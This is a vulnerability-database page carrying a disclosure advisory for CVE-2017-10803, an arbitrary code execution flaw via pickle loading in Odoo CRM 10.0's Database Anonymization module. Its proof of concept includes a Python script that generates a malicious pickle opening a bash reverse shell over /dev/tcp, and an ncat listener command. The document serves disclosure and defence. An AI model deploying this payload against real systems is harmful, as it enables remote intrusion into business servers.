Vulners
Lucene search
Odoo CRM 10.0 - Code Execution
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Database Anonymization Arbitrary Code Execution Vulnerability in Multiple Odoo Products | 5 Jul 201700:00 | – | cnvd |
 | CVE-2017-10803 | 4 Jul 201718:00 | – | cve |
 | CVE-2017-10803 | 4 Jul 201718:00 | – | cvelist |
 | CVE-2017-10803 | 4 Jul 201718:00 | – | debiancve |
 | EUVD-2017-2447 | 7 Oct 202500:30 | – | euvd |
 | Odoo CRM 10.0 - Code Execution | 30 Jun 201700:00 | – | exploitpack |
 | CVE-2017-10803 | 4 Jul 201718:29 | – | nvd |
 | Code injection | 4 Jul 201718:29 | – | prion |
## Vulnerability Summary
The following advisory describe arbitrary Python code execution found in Odoo CRM version 10.0
Odoo is a suite of open source business apps that cover all your company needs: CRM, eCommerce, accounting, inventory, point of sale, project management, etc. Odoo’s unique value proposition is to be at the same time very easy to use and fully integrated.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
Odoo has done a private disclosure for the issue we reported, and the patch was merged in all supported branches.
CVE: CVE-2017-10803
The full public disclosure will be available at https://github.com/odoo/odoo/issues/17898.
## Vulnerability Details
One of the core Odoo modules, Database Anonymization, allows an administrator to anonymize the contents of the Odoo database. The module does this by serializing the contents of the existing database using Python’s pickle module into a backup file before modifying the contents of the database. The administrator can then de-anonymize the database by loading the pickled backup file.
Python’s pickle module can be made to execute arbitrary Python code when loading an attacker controlled pickle file. With this, an administrator can execute arbitrary Python code with the same privilege level as the Odoo webapp by anonymizing the database then attempt the de-anonymization process with a crafted pickle file.
## Proof of Concept
In order to exploit the vulnerability, you should navigate to the Apps page (the link is in the navigation bar at the top and search for and install “Database Anonymization” in the search bar. We have to deselect the “Apps” filter in the search bar for it to show up.
Once we have the module installed, we navigate to the settings page and select “Anonymize database” under “Database anonymization” and click on the “Anonymize Database” button. Next, we refresh the page and navigate to the same page under settings. We upload the “exploit.pickle” file generated our script and click on “Reverse the Database Anonymization” button. We should have a reverse shell.
The following Python file generate a malicious pickle file that attempts (via bash) to connect back to a listener on port 8000:
```
import cPickle
import os
import base64
import pickletools
class Exploit(object):
def __reduce__(self):
return (os.system, (("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"),))
with open("exploit.pickle", "wb") as f:
cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
```
We then use netcat listener on port 8000:
```
ncat -nlvp 8000
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jun 2017 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 36.5
CVSS 28.5
EPSS0.01551